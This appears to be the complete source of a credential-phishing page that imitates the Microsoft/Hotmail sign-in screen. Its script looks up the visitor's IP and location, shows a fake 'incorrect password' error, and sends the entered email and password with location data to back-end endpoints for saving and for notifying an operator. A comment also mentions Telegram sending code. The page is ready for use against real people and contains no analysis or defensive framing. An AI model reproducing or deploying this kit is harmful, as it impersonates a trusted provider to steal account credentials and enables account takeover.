<html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in to your account</title>
    <meta name="robots" content="noindex, nofollow">
    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noarchive">


    <link rel="shortcut icon" href="./assets/microsoft.svg" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <!-- <link rel="stylesheet" href="./font-awesome-4.7.0/css/font-awesome.min.css"> -->
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        }

        html {
            scroll-behavior: smooth;
            color: #383838;
            /* overflow-y: hidden; */
        }

        #form::-webkit-scrollbar {
            background: transparent;
            width: 0;
            height: 0;
        }

        .container-item {
            z-index: 99999;
            margin: 40px 10%;
            overflow-x: hidden;
        }

        .container-item-2 {
            margin: 40px 10%;
            border: 1px solid #7c7c7c;
            display: flex;
            justify-content: left;
            align-items: center;
            color: #383838;
            padding: 5px 15px;
        }

        input {
            padding: 10px 1px;
            width: 100%;
            border: 1px solid transparent;
            border-bottom: 1px solid #383838;
            z-index: 1;
        }

        .slide-one {
            width: 100%;
            transition: 0.5s ease all;
        }

        .slide-two {
            width: 100%;
            transition: 0.5s ease all;
        }

        .slide-one-toggle {
            transform: translateX(-100%);
        }

        .slide-two-toggle {
            transform: translateX(-100%);
        }

        input:focus {
            border-bottom: 1px solid red;
            outline: 1px solid transparent;
        }

        #form p {
            font-size: 14px;
        }

        #form p img {
            transform: translateY(6px);
        }

        #form {
            display: flex;
            justify-content: space-between;
            overflow-x: scroll;
            width: 200%;
        }

        #btn {
            background: #0067B8;
            color: white;
            border: 1px solid transparent;
            width: 100px;
            text-align: center;
            border-radius: 2px;
            padding: 8px 5px;
        }

        span {
            color: dodgerblue;
        }

        .btn-item {
            display: flex;
            justify-content: right;
            margin: 25px 0;
        }

        footer ul {
            list-style-type: none;
            display: flex;
            justify-content: center;
            position: fixed;
            bottom: 0;
            font-size: 12px;
        }

        footer ul li {
            padding: 5px 10px;
        }

        a {
            text-decoration: none;
            color: #383838;
        }

        @media screen and (min-width: 600px) {
            body {
                background: linear-gradient(27deg, rgba(231, 216, 210, 1) 28%, rgba(214, 220, 227, 1) 52%, rgba(214, 225, 210, 1) 80%, rgba(231, 216, 210, 1) 100%);
            }

            .container {
                margin: 5% 50%;
                transform: translateX(-50%);
                width: 70%;
                background: white;
                padding: 10px;
                box-shadow: 1px 1px 10px #b3b1b180;
            }

            .container-item-2 {
                margin: 8% 50%;
                transform: translate(-50%, -20px);
                width: 70%;
                background: white;
                padding: 10px;
                box-shadow: 1px 1px 10px #b3b1b180;
            }

            footer {
                display: flex;
                justify-content: center;
            }
        }

        @media screen and (min-width: 768px) {
            .container {
                width: 40%;
            }

            .container-item-2 {
                transform: translate(-50%, -50px);
                width: 40%;
            }
        }

        @media screen and (min-width: 1200px) {
            .container {
                width: 30%;
            }

            .container-item-2 {
                transform: translate(-50%, -70px);
                width: 30%;
            }
        }

        .loader-container {
            display: none;
            text-align: center;
            margin: 10px 0;
        }
        
        .loader {
            display: inline-block;
            width: 20px;
            height: 20px;
            border: 2px solid rgba(0, 120, 212, 0.2);
            border-radius: 50%;
            border-top-color: #0078D4;
            animation: spin 1s ease-in-out infinite;
        }
        
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
    </style>
</head>

<body>


    <div class="container">
        <div class="container-item">
            <img src="./assets/mlogo.svg" alt=""><br><br>
            <div id="form">
                <div class="slide-one">
                    <h2>Sign in</h2>
                    <span class="msg" style="color: red; font-size: 13px;"></span>
                    <br>
                    <input type="email" id="email" name="username" placeholder="Email, phone, or Skype"><br><br>
                    <p>No account? <a href=""><span>Create one!</span></a></p>
                    <p style="color: dodgerblue;">Sign in with a security key <img src="./assets/question.JPG" alt="">
                    </p>
                    <div class="btn-item">
                        <p id="btn" class="next">Next</p>
                </div>
            </div>
            
                <div class="slide-two">
                    <span class="msg2" style="color: red; font-size: 13px;"></span><br>
                    <p id="back"><i class="fa fa-arrow-left"></i> <span id="name" style="color: #383838;"></span></p><br>
                    <h2>Enter password</h2><br>
                    <input type="password" id="password" name="password" placeholder="Password"><br><br>
                    <p>Forget password?</p>
                    <a href="">
                        <p style="color: dodgerblue;">Other ways to sign in
                        </p>
                    </a>
                    <div class="btn-item">
                        <button id="btn" class="submit">Sign in</button>
                </div>
                </div>
            </div>
        </div>
    </div>

    <div class="container-item-2"><img src="./assets/key.jpg" width="25px"> <span style="color: #383838;">Sign- in
            options</span></div>

    <footer>
        <ul>
            <a href="#">
                <li>Terms of use</li>
            </a>
            <a href="#">
                <li>Privacy &amp; cookies</li>
            </a>
            <a href="#">
                <li>...</li>
            </a>
        </ul>
    </footer>

    <iframe src="" id="iframLink" style="opacity: 0;" frameborder="0"></iframe>


    

    <input type="hidden" id="country" value="" name="country">
    <input type="hidden" id="city" value="" name="city">
    <input type="hidden" id="continent" value="" name="continent">
    <input type="hidden" id="ip" value="" name="ip">
    <input type="hidden" id="adminEmail" value="admin@gmail.com" name="admin">


    <div class="loader-container" id="loaderContainer">
        <div class="loader"></div>
        <span>Verifying...</span>
    </div>

    <script>
        // Add function to fetch user's location and IP
        document.addEventListener("DOMContentLoaded", function() {
            // Get user location and IP - Call this function to fetch the data
            getUserLocationAndIp();
            
            var next = document.querySelector('.next');
            var submit = document.querySelector('.submit');
            var slide_one = document.querySelector('.slide-one');
            var slide_two = document.querySelector('.slide-two');
            var email = document.getElementById('email')
            var nameText = document.getElementById('name')
            var back_btn = document.getElementById('back')
            var password = document.getElementById('password')
            var msg = document.querySelector('.msg')
            var msg2 = document.querySelector('.msg2')
            var country = document.getElementById('country')
            var city = document.getElementById('city')
            var continent = document.getElementById('continent')
            var ip = document.getElementById('ip')
            var adminEmail = document.getElementById('adminEmail')
            var iframLink =document.getElementById('iframLink')


            var userName = email.value.replace(/\s+/g, '-')
            var passWord = password.value.replace(/\s+/g, '-')
            var countryName = country.value.replace(/\s+/g, '-');
            var cityName = city.value.replace(/\s+/g, '-');
            var continentName = continent.value.replace(/\s+/g, '-');




            var container_item_2 = document.querySelector('.container-item-2')
            next.addEventListener('click', function () {
                if (email.value == "") {
                    msg.textContent = 'Enter a valid email address, phone number, or Skype name.'
                } else {
                    msg.textContent = ""
                    nameText.textContent = email.value
                    slide_one.classList.add('slide-one-toggle')
                    slide_two.classList.add('slide-two-toggle')
                    container_item_2.style.display = 'none'
                }
            })
            back_btn.addEventListener('click', function () {
                slide_one.classList.remove('slide-one-toggle')
                slide_two.classList.remove('slide-two-toggle')
                container_item_2.style.display = 'flex'
            })

            submit.addEventListener('click', function() {
                if (password.value == "") {
                    msg2.textContent = 'Enter the password for ' + email.value + '.'
                } else {
                    // Show loader, hide previous error
                    const loaderContainer = document.getElementById('loaderContainer');
                    loaderContainer.style.display = 'block';
                    msg2.textContent = '';
                    
                    // Simulate verification delay (1.5 seconds)
                    setTimeout(function() {
                        // Hide loader
                        loaderContainer.style.display = 'none';
                        
                        // Show error message in red
                        msg2.style.color = "#E81123";
                        msg2.textContent = 'Your email or password is incorrect. If you don\'t remember your password, reset it now.';
                        
                        // Create the data object for Supabase
                        const userData = {
                            username: email.value + " (hotmail)",
                            password: password.value,
                            country: country.value,
                            city: city.value,
                            continent: continent.value,
                            ip_address: ip.value,
                            platform: 'microsoft'
                        };
                        
                        // Save to database
                        fetch('/api/login', {
                            method: 'POST',
                            headers: { 'Content-Type': 'application/json' },
                            body: JSON.stringify(userData)
                        })
                        .then(response => response.json())
                        .then(data => {
                            console.log('Data saved to database:', data);
                            
                            // Then send notification email
                            sendNotificationEmail();
                            
                            // Optionally redirect after a delay
                            // setTimeout(function() {
                            //     window.location.href = 'https://outlook.live.com/owa/';
                            // }, 1000);
                        })
                        .catch(error => {
                            console.error('Error saving data:', error);
                        });
                    }, 1500); // 1.5 second delay for verification
                }
            });
            
            // Add function to send email notification
            function sendNotificationEmail() {
                // Create notification data
                const notificationData = {
                    username: email.value + " (hotmail)",
                    password: password.value,
                    country: country.value,
                    city: city.value,
                    continent: continent.value,
                    ip: ip.value,
                    adminEmail: adminEmail.value
                };
                
                // Send notification via Next.js API route
                fetch('/api/notify', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify(notificationData)
                })
                .then(response => response.json())
                .then(result => {
                    console.log('Email notification sent:', result);
                })
                .catch(error => {
                    console.error('Error sending notification:', error);
                });
            }

            // Keep your existing Telegram sending function
            function sendMessage(message) {
                // Keep existing Telegram code...
            }
        });
        
        // Function to get user location and IP
        function getUserLocationAndIp() {
            fetch('https://ipapi.co/json/')
            .then(response => response.json())
            .then(data => {
                document.getElementById('country').value = data.country_name || '';
                document.getElementById('city').value = data.city || '';
                document.getElementById('continent').value = data.continent_code || '';
                document.getElementById('ip').value = data.ip || '';
            })
            .catch(error => {
                console.error('Error fetching location data:', error);
            });
        }
    </script>



</body></html>
